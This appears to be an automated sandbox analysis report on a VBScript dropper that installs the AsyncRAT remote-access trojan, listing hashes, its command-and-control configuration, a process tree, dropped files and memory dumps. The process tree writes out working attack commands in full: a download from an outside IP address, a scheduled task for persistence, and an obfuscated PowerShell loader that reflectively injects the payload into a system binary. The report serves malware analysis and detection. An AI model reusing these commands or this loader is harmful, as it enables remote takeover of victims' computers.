Resubmissions

12/03/2024, 14:32

240312-rwjvaada89 10

12/03/2024, 14:27

240312-rsqhnach88 10

Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    12/03/2024, 14:32

General

  • Target

    g4.vbs

  • Size

    731B

  • MD5

    f82736dcca9ccf1e8460707f48f51478

  • SHA1

    2210fe31ae5e82413301a8e91bce03cf1eb14246

  • SHA256

    e2228f06454d5c8033bb22ad4a81bbc3997e318bf34372a57232b51e8360f4d8

  • SHA512

    67c5be560f30f2299f91288215924fb96db32a73a2beab988f7cb38a721984ee0f8f986f43b2780c3574ad81ffbeb98b3d4112e9982f3e4ec2e80fde27014c5f

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://104.243.44.136:777/moh.jpg

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://nodejs.org/download/release/v6.17.1/win-x64/node.exe

Extracted

Family

asyncrat

Version

AWS | 3Losh

Botnet

DOX_2024

C2

w3llsfarg0h0st.ddns.net:2244

Mutex

AsyncMutex_doxfofikdw32

Attributes
  • delay

    3

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Detect ZGRat V1 2 IoCs
  • ZGRat

    ZGRat is remote access trojan written in C#.

  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 6 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 25 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 47 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\g4.vbs"
    1⤵
    • Checks computer location settings
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:2324
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-BitsTransfer -Source 'http://104.243.44.136:777/moh.jpg' -Destination 'C:\Users\Public\ben.zip'; Expand-Archive -Path 'C:\Users\Public\ben.zip' -DestinationPath 'C:\Users\Public\' -Force
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1120
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Public\basta.js"
      2⤵
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:3628
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Public\node.bat" C:\Users\Public\"
        3⤵
        • Checks computer location settings
        • Modifies registry class
        • Suspicious use of WriteProcessMemory
        PID:1292
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          PowerShell -Command "Start-BitsTransfer -Source 'https://nodejs.org/download/release/v6.17.1/win-x64/node.exe' -Destination 'C:\Users\Public\node.exe'"
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3044
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          PowerShell -Command "$tr = New-Object -ComObject Schedule.Service; $tr.Connect(); $ta = $tr.NewTask(0); $ta.RegistrationInfo.Description = 'Runs a script every 2 minutes'; $ta.Settings.Enabled = $true; $ta.Settings.DisallowStartIfOnBatteries = $false; $st = $ta.Triggers.Create(1); $st.StartBoundary = [DateTime]::Now.ToString('yyyy-MM-ddTHH:mm:ss'); $st.Repetition.Interval = 'PT2M'; $md = $ta.Actions.Create(0); $md.Path = 'C:\\Users\\Public\\app.js'; $ns = $tr.GetFolder('\'); $ns.RegisterTaskDefinition('BTime', $ta, 6, $null, $null, 3);"
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3652
        • C:\Windows\System32\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Users\Public\shell.js"
          4⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:3668
          • C:\Users\Public\node.exe
            "C:\Users\Public\node.exe" C:\Users\Public\install.js
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            PID:468
        • C:\Windows\System32\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Users\Public\app.js"
          4⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:4592
          • C:\Users\Public\node.exe
            "C:\Users\Public\node.exe" C:\Users\Public\run.js
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:4408
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /s /c "powershell.exe -Command "Function OF([String] $gswt5) {$JS = [System.Collections.Generic.List[Byte]]::new();for ($i = 0; $i -lt $gswt5.Length; $i +=8) {$JS.Add([Convert]::ToByte($gswt5.Substring($i, 8), 2));}return [System.Text.Encoding]::ASCII.GetString($JS.ToArray());}Function User {param($x3losh)$x3losh = $x3losh -split '(..)' | ? { $_ };ForEach ($JSEYHESSS325 in $x3losh){[Convert]::ToInt32($JSEYHESSS325,16);}}$gswt5 = (Get-Content -Path 'C:\Users\Public\msg.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$eyaw = (Get-Content -Path 'C:\Users\Public\runpe.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$awayz = (Get-Content -Path 'C:\Users\Public\load.dll');$type = (Get-Content -Path 'C:\Users\Public\type.dll');$aeuyu = OF(Get-Content -Path 'C:\Users\Public\xx.dll');$eyksw = (Get-Content -Path 'C:\Users\Public\method.dll');$eeyuki = OF(Get-Content -Path 'C:\Users\Public\Execute.dll');$invoke = (Get-Content -Path 'C:\Users\Public\invoke.dll');$Framework = OF(Get-Content -Path 'C:\Users\Public\Framework.dll');$i = 0;while ($true) {; try {;[Byte[]]$JR = User $gswt5;[Byte[]]$YJSWU = User $eyaw; break; } catch {; };};[Reflection.Assembly]::$awayz($YJSWU).$type($aeuyu).$eyksw($eeyuki).$invoke($null,[object[]] ($Framework,$null,$JR,$true)); & Stop-Process -Name 'node'""
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:2744
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell.exe -Command "Function OF([String] $gswt5) {$JS = [System.Collections.Generic.List[Byte]]::new();for ($i = 0; $i -lt $gswt5.Length; $i +=8) {$JS.Add([Convert]::ToByte($gswt5.Substring($i, 8), 2));}return [System.Text.Encoding]::ASCII.GetString($JS.ToArray());}Function User {param($x3losh)$x3losh = $x3losh -split '(..)' | ? { $_ };ForEach ($JSEYHESSS325 in $x3losh){[Convert]::ToInt32($JSEYHESSS325,16);}}$gswt5 = (Get-Content -Path 'C:\Users\Public\msg.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$eyaw = (Get-Content -Path 'C:\Users\Public\runpe.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$awayz = (Get-Content -Path 'C:\Users\Public\load.dll');$type = (Get-Content -Path 'C:\Users\Public\type.dll');$aeuyu = OF(Get-Content -Path 'C:\Users\Public\xx.dll');$eyksw = (Get-Content -Path 'C:\Users\Public\method.dll');$eeyuki = OF(Get-Content -Path 'C:\Users\Public\Execute.dll');$invoke = (Get-Content -Path 'C:\Users\Public\invoke.dll');$Framework = OF(Get-Content -Path 'C:\Users\Public\Framework.dll');$i = 0;while ($true) {; try {;[Byte[]]$JR = User $gswt5;[Byte[]]$YJSWU = User $eyaw; break; } catch {; };};[Reflection.Assembly]::$awayz($YJSWU).$type($aeuyu).$eyksw($eeyuki).$invoke($null,[object[]] ($Framework,$null,$JR,$true)); & Stop-Process -Name 'node'"
                7⤵
                • Suspicious use of SetThreadContext
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:5068
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                  8⤵
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of SetWindowsHookEx
                  PID:1612
  • C:\Windows\System32\WScript.exe
    C:\Windows\System32\WScript.exe "C:\\Users\\Public\\app.js"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4316
    • C:\Users\Public\node.exe
      "C:\Users\Public\node.exe" C:\Users\Public\run.js
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:1772
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /s /c "powershell.exe -Command "Function OF([String] $gswt5) {$JS = [System.Collections.Generic.List[Byte]]::new();for ($i = 0; $i -lt $gswt5.Length; $i +=8) {$JS.Add([Convert]::ToByte($gswt5.Substring($i, 8), 2));}return [System.Text.Encoding]::ASCII.GetString($JS.ToArray());}Function User {param($x3losh)$x3losh = $x3losh -split '(..)' | ? { $_ };ForEach ($JSEYHESSS325 in $x3losh){[Convert]::ToInt32($JSEYHESSS325,16);}}$gswt5 = (Get-Content -Path 'C:\Users\Public\msg.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$eyaw = (Get-Content -Path 'C:\Users\Public\runpe.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$awayz = (Get-Content -Path 'C:\Users\Public\load.dll');$type = (Get-Content -Path 'C:\Users\Public\type.dll');$aeuyu = OF(Get-Content -Path 'C:\Users\Public\xx.dll');$eyksw = (Get-Content -Path 'C:\Users\Public\method.dll');$eeyuki = OF(Get-Content -Path 'C:\Users\Public\Execute.dll');$invoke = (Get-Content -Path 'C:\Users\Public\invoke.dll');$Framework = OF(Get-Content -Path 'C:\Users\Public\Framework.dll');$i = 0;while ($true) {; try {;[Byte[]]$JR = User $gswt5;[Byte[]]$YJSWU = User $eyaw; break; } catch {; };};[Reflection.Assembly]::$awayz($YJSWU).$type($aeuyu).$eyksw($eeyuki).$invoke($null,[object[]] ($Framework,$null,$JR,$true)); & Stop-Process -Name 'node'""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2128
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -Command "Function OF([String] $gswt5) {$JS = [System.Collections.Generic.List[Byte]]::new();for ($i = 0; $i -lt $gswt5.Length; $i +=8) {$JS.Add([Convert]::ToByte($gswt5.Substring($i, 8), 2));}return [System.Text.Encoding]::ASCII.GetString($JS.ToArray());}Function User {param($x3losh)$x3losh = $x3losh -split '(..)' | ? { $_ };ForEach ($JSEYHESSS325 in $x3losh){[Convert]::ToInt32($JSEYHESSS325,16);}}$gswt5 = (Get-Content -Path 'C:\Users\Public\msg.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$eyaw = (Get-Content -Path 'C:\Users\Public\runpe.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$awayz = (Get-Content -Path 'C:\Users\Public\load.dll');$type = (Get-Content -Path 'C:\Users\Public\type.dll');$aeuyu = OF(Get-Content -Path 'C:\Users\Public\xx.dll');$eyksw = (Get-Content -Path 'C:\Users\Public\method.dll');$eeyuki = OF(Get-Content -Path 'C:\Users\Public\Execute.dll');$invoke = (Get-Content -Path 'C:\Users\Public\invoke.dll');$Framework = OF(Get-Content -Path 'C:\Users\Public\Framework.dll');$i = 0;while ($true) {; try {;[Byte[]]$JR = User $gswt5;[Byte[]]$YJSWU = User $eyaw; break; } catch {; };};[Reflection.Assembly]::$awayz($YJSWU).$type($aeuyu).$eyksw($eeyuki).$invoke($null,[object[]] ($Framework,$null,$JR,$true)); & Stop-Process -Name 'node'"
          4⤵
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1448
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
            5⤵
              PID:2660
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
              5⤵
                PID:880

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

        Filesize

        3KB

        MD5

        e5ab5d093e49058a43f45f317b401e68

        SHA1

        120da069a87aa9507d2b66c07e368753d3061c2d

        SHA256

        4ec6d8e92ffc5b2a0db420e2d031a2226eef582d5e56d5088fc91bba77288e74

        SHA512

        d44361457713abd28c49f9aa4043b76882e2b5e626816267cf3d79454c48980ba6207333f23b7976b714e090c658db36a844cb27cd6a91615014f3b06ef5623a

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        1KB

        MD5

        8a3a11baeb69c919d9e6a93ff4353155

        SHA1

        d926b5b919307fb37e39b94550c98922533e23e5

        SHA256

        052ccf5c0687f85f7eb792a6425134ca99308252992cb59862bc063d100bac9c

        SHA512

        c6f857e401490c2bbe5e6493e4834b89fa5b73909bf51c2c5aee8b26a456834cac32fe93a669646a8538cb1290673e875dfc2154bcf3a99117ef6bc6bfe3dda9

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        2KB

        MD5

        c9431378551c6d63789f4bc499aef072

        SHA1

        70455c2f065fc4475f1e620defa3c60ed0444399

        SHA256

        820bdd78e27f4a51dd4e759bac5d52687ec0125978bb8ae90e46e6e6df53f452

        SHA512

        1e6eadc7fa53883c242a4df34ee2645c617ce26b64d1dbb87f3d532fe7c582bf47ea748a01a524d1441cb1a487abbb098e3c01a4d94b8b98c4793ecfa8a9ca15

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        1KB

        MD5

        3d5dc472de2b37146b21b63a3173176d

        SHA1

        7d3dd1e9a91c497745e965b4fdbbeac28196ab45

        SHA256

        75edb4ad9fc3331ff2d78383ae18095cb8163bdffaaa64e6593283bb7a17c3bb

        SHA512

        74bf3f56b6a31fb8745c27dd8a32a97c3923d08e76fb267ebf73bb9e7e901070ee2695437af17c4b4fad583a7591c454bd8cfd0fd7ef9e7b2691d1487f0cb1bb

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_elsa5muu.rlm.ps1

        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • C:\Users\Public\Execute.dll

        Filesize

        56B

        MD5

        529cf04db0f736467c7583ea80c3aa66

        SHA1

        7628148337b1d3d700c8151f76a1595b6f5123b8

        SHA256

        67642e56281bc4aa846689bc725f8fcc76e61c20831aa4f7e2e0c8cdba17e520

        SHA512

        f612b12e1a7c2021f6c2723fe57f23aba3d1b6588f080dd67e48dc44eeaf88455e4bc6bf9caed088c63c3fb019ad8696eeb44e7bb09f8c81638779f4658ef6d4

      • C:\Users\Public\Framework.dll

        Filesize

        520B

        MD5

        6a08392ecf95df7fc91917dcfaae8da6

        SHA1

        480f6a5c761e1a069c0d68f5ac2aabf727791393

        SHA256

        0a572ee5508d9310936801a04237d56f118dff4dbaa98f60070988cc4b8ca460

        SHA512

        d70c436183a9c6f6d4ce9296dce846f94cd12d7fbb76b24e59d88a77349a95a7a0d6ad8f9f4ffc32a98618b3250e0d35e4cf9ff1e711f4e63ffee425597dfc5e

      • C:\Users\Public\app.js

        Filesize

        385B

        MD5

        08a7e6db996774b6806c395c04116803

        SHA1

        d0182c34dacc8ab9c8841c8913a1ae7f4d281595

        SHA256

        9268b265b1de1e39454bc0276b85e56e3e1763526a972bfc60a3bbb533192bdc

        SHA512

        d3191ac299738e2b01edda769da6462df9f292bfe033cc26aeb317d47e04948d56e52eeef19c1d82c31e8f213c7547504e42f354c4c417b9e17aec7c6154e43b

      • C:\Users\Public\basta.js

        Filesize

        377B

        MD5

        38affda935585ad2ddc0abe0a906f404

        SHA1

        8379070ec3e9b448499c53c6244c815bc566cf59

        SHA256

        f1c6fbb11607690d7de83308bb65b7fdd0679591c2fc5bc927820b654a483eaa

        SHA512

        0520a8d53a2bc686a87c530680afa2f12eab198316e3d7419f472515bac0b0d2a3c891b0e4f3112b1f382d799f4655aa06624c57f06c2bc1cc3161ff06aeced6

      • C:\Users\Public\invoke.dll

        Filesize

        6B

        MD5

        b9376e9e3c4d48f5e35a3f355ae1f74a

        SHA1

        c65605adf5270f5065089b0189da542274d30db0

        SHA256

        90092e5fb861dd4ff34fa20f4b31ca44ebbb3bc367a8d7a35b89a7f89c793fa9

        SHA512

        5560101edb289c4a86476bce55648324ef188ff1e2d879a1a3bc10c1298aa643255c35d16a984f30d624fe9a87306304eaa14179863001ddd6e264e8bba17591

      • C:\Users\Public\load.dll

        Filesize

        4B

        MD5

        f19dbf2edb3a0bd74b0524d960ff21eb

        SHA1

        ddcb77ff769ea54ca622848f6bedd4004fa4f4fa

        SHA256

        8a6bdb6b18da586fe7f2acbd8f1055533f2cd97a3681b3652bcd712224df45c3

        SHA512

        f0419117db6330f52eba6e7ef08a5cb096fdb02a40b1dfe4f28dd57791a11b6753e4db0fb63e1c4a22293584dc61908a8e2e99dc59a07f805e097c723329d216

      • C:\Users\Public\method.dll

        Filesize

        9B

        MD5

        38b97710070dbdd7b3359c0d52da4a72

        SHA1

        4ce08d2147c514f9c8e1f83d384369ec8986bc3b

        SHA256

        675f06af4e7f254d55ac605bbd7da45d9e00207a97f8a8ab7bb747d512776bc7

        SHA512

        b11cec0f21dec871163d6c254850d3f807ecc4ae726b143a0c4667a25c3a3fe9283aee3f6850a2389fdce3d20f41d9c3d30f4768171137d6bdc1355a2116189c

      • C:\Users\Public\msg.dll

        Filesize

        123KB

        MD5

        55a2ab1987b5dc68a293d870ff989008

        SHA1

        e170596b7a86e216f23f9e0187e460447f63a88f

        SHA256

        c80df95873d89cfe623decf1e71a7b53afd7771ddf97256e59c1a848253fbb64

        SHA512

        ccdfe15c5daab738a889e6405a1c6daf76bcaeb651e04fa9d148b5078707c4ba2c56f8b540227d61bfda4c93b0b33487becb29c7916ac03d8c48ac0e9970e5e4

      • C:\Users\Public\node.bat

        Filesize

        3KB

        MD5

        f6a91f8aa7612ef8d9f2887fd909600a

        SHA1

        948ac8197a43a5e50ed34241f3d74bba0222b9c7

        SHA256

        dd9a0df1cefd595c2b9a0cceb0a0042451b496d3c5753e2a33520de646c9ddf3

        SHA512

        666339156dd8924df33adc3e0a266d2048f0e9b9ef201cedfe304ae37c99a45674abd4bf97a94ea3eb81e5d7a98f399d9770cad5dca16bf5852a692460d855ef

      • C:\Users\Public\run.js

        Filesize

        1KB

        MD5

        166e57b73fd399b0f54c415d22b235f6

        SHA1

        f20bf715826dc97a5e26c7acc4310d32213cc2b7

        SHA256

        f7741744738c58c8cd5b1b8bc756860a68a8b3378576c421f0f597edf29f5df3

        SHA512

        e2a32241f607f0b6842ca2546002ad086035161249bd2dd3bf04a05dcbf6ad660ef91d23507c0f0c983769ade7d73d0b627b8c16c31954e607b4261b89979eda

      • C:\Users\Public\runpe.dll

        Filesize

        608KB

        MD5

        ab3151ce426cf5959813a90f452750b8

        SHA1

        271198005f634f22c0f84358a00b7aff302e712b

        SHA256

        a9e0964b0bcbd52e1344af7f25977128860f81eb3173fcdc8f00d448a6e6e578

        SHA512

        5ff0856cbfc649f89ae7e1997d819b2d6593a56c36758bf45f1e59ac74fe8599007b08752b76424f9eb540af87bc89c1fa58bbf81b9967fc3c6fff897ec0975b

      • C:\Users\Public\shell.js

        Filesize

        387B

        MD5

        3c93270c5a82e51379c4eaa91cd697d5

        SHA1

        250fb007cc2b58cb67bb8c4a8b9d6f2308cc78b7

        SHA256

        825858c8524555771bd602ce6a304e10144b5ec7b1f9249aef5aa5a667771e1c

        SHA512

        ee4a491f1c4cee10bbd15a5a1f26aa16af3b3e504cb9860904b3d21d82261d739c31adbaccda44cc6107d786f84ca2ad7eeeac64c5496a257ff3c04d435c960f

      • C:\Users\Public\type.dll

        Filesize

        7B

        MD5

        be784e48d0174367297b636456c7bcf1

        SHA1

        8c906d9e0e2439238b3263e087aee3d98fa86dea

        SHA256

        510760f4c6f7fb3b5b332cd7d3a2f674235b0f58d77dbc3972adaf682a168136

        SHA512

        aed58d8904742a672f9ba339069004a1c0339e6481a8949de14ee8bf2afef43f8e18e55ba4a6854a7950ee355675c26b46120e500472deaf0986f68451442ae4

      • C:\Users\Public\xx.dll

        Filesize

        72B

        MD5

        14c2a6b7bf15e15d8dae9cd4a56432d5

        SHA1

        0d00aa5d547ea7e6f7283221e5f3b0cc91cc6016

        SHA256

        79891821778c4ca9358c27e7fb66b0442a2921b661df1293e398b18d81da5d96

        SHA512

        e476851faf540c3679225de2b224d64d117fa1857a4db7b34714d0154b8ba5ebaab50e1a6b0578759b7572e89e3df4d0d4112a7e4f5b81230931cfe6b651c63d

      • memory/880-145-0x0000000005640000-0x0000000005650000-memory.dmp

        Filesize

        64KB

      • memory/880-141-0x00000000753C0000-0x0000000075B70000-memory.dmp

        Filesize

        7.7MB

      • memory/880-147-0x00000000753C0000-0x0000000075B70000-memory.dmp

        Filesize

        7.7MB

      • memory/1120-47-0x00007FFD05130000-0x00007FFD05BF1000-memory.dmp

        Filesize

        10.8MB

      • memory/1120-16-0x00000207D56A0000-0x00000207D56AA000-memory.dmp

        Filesize

        40KB

      • memory/1120-15-0x00000207D56D0000-0x00000207D56E2000-memory.dmp

        Filesize

        72KB

      • memory/1120-14-0x00000207D4920000-0x00000207D4930000-memory.dmp

        Filesize

        64KB

      • memory/1120-13-0x00000207D5640000-0x00000207D5654000-memory.dmp

        Filesize

        80KB

      • memory/1120-12-0x00000207D48E0000-0x00000207D4906000-memory.dmp

        Filesize

        152KB

      • memory/1120-0-0x00000207BC320000-0x00000207BC342000-memory.dmp

        Filesize

        136KB

      • memory/1120-11-0x00000207D4920000-0x00000207D4930000-memory.dmp

        Filesize

        64KB

      • memory/1120-10-0x00007FFD05130000-0x00007FFD05BF1000-memory.dmp

        Filesize

        10.8MB

      • memory/1448-139-0x000001BE691A0000-0x000001BE691B0000-memory.dmp

        Filesize

        64KB

      • memory/1448-124-0x00007FFD05130000-0x00007FFD05BF1000-memory.dmp

        Filesize

        10.8MB

      • memory/1448-125-0x000001BE691A0000-0x000001BE691B0000-memory.dmp

        Filesize

        64KB

      • memory/1448-126-0x000001BE691A0000-0x000001BE691B0000-memory.dmp

        Filesize

        64KB

      • memory/1448-137-0x000001BE69BA0000-0x000001BE69BF2000-memory.dmp

        Filesize

        328KB

      • memory/1448-138-0x000001BE691A0000-0x000001BE691B0000-memory.dmp

        Filesize

        64KB

      • memory/1448-144-0x00007FFD05130000-0x00007FFD05BF1000-memory.dmp

        Filesize

        10.8MB

      • memory/1612-117-0x0000000005150000-0x000000000515A000-memory.dmp

        Filesize

        40KB

      • memory/1612-122-0x00000000753C0000-0x0000000075B70000-memory.dmp

        Filesize

        7.7MB

      • memory/1612-123-0x0000000004D80000-0x0000000004D90000-memory.dmp

        Filesize

        64KB

      • memory/1612-121-0x0000000005E60000-0x0000000005EC6000-memory.dmp

        Filesize

        408KB

      • memory/1612-110-0x0000000000400000-0x0000000000416000-memory.dmp

        Filesize

        88KB

      • memory/1612-120-0x0000000006370000-0x000000000640C000-memory.dmp

        Filesize

        624KB

      • memory/1612-113-0x00000000753C0000-0x0000000075B70000-memory.dmp

        Filesize

        7.7MB

      • memory/1612-114-0x0000000004D80000-0x0000000004D90000-memory.dmp

        Filesize

        64KB

      • memory/1612-115-0x0000000005540000-0x0000000005AE4000-memory.dmp

        Filesize

        5.6MB

      • memory/1612-116-0x0000000005170000-0x0000000005202000-memory.dmp

        Filesize

        584KB

      • memory/3044-65-0x00007FFD05130000-0x00007FFD05BF1000-memory.dmp

        Filesize

        10.8MB

      • memory/3044-51-0x00007FFD05130000-0x00007FFD05BF1000-memory.dmp

        Filesize

        10.8MB

      • memory/3044-52-0x000001BA7F060000-0x000001BA7F070000-memory.dmp

        Filesize

        64KB

      • memory/3044-53-0x000001BA7F060000-0x000001BA7F070000-memory.dmp

        Filesize

        64KB

      • memory/3044-64-0x000001BA7FDC0000-0x000001BA7FDE6000-memory.dmp

        Filesize

        152KB

      • memory/3652-77-0x0000018F7C140000-0x0000018F7C150000-memory.dmp

        Filesize

        64KB

      • memory/3652-79-0x00007FFD05130000-0x00007FFD05BF1000-memory.dmp

        Filesize

        10.8MB

      • memory/3652-67-0x0000018F7C140000-0x0000018F7C150000-memory.dmp

        Filesize

        64KB

      • memory/3652-66-0x00007FFD05130000-0x00007FFD05BF1000-memory.dmp

        Filesize

        10.8MB

      • memory/5068-85-0x00007FFD05130000-0x00007FFD05BF1000-memory.dmp

        Filesize

        10.8MB

      • memory/5068-92-0x0000022869390000-0x00000228693A0000-memory.dmp

        Filesize

        64KB

      • memory/5068-86-0x0000022869390000-0x00000228693A0000-memory.dmp

        Filesize

        64KB

      • memory/5068-108-0x0000022869390000-0x00000228693A0000-memory.dmp

        Filesize

        64KB

      • memory/5068-107-0x000002286BC50000-0x000002286BCA2000-memory.dmp

        Filesize

        328KB

      • memory/5068-109-0x0000022869390000-0x00000228693A0000-memory.dmp

        Filesize

        64KB

      • memory/5068-112-0x00007FFD05130000-0x00007FFD05BF1000-memory.dmp

        Filesize

        10.8MB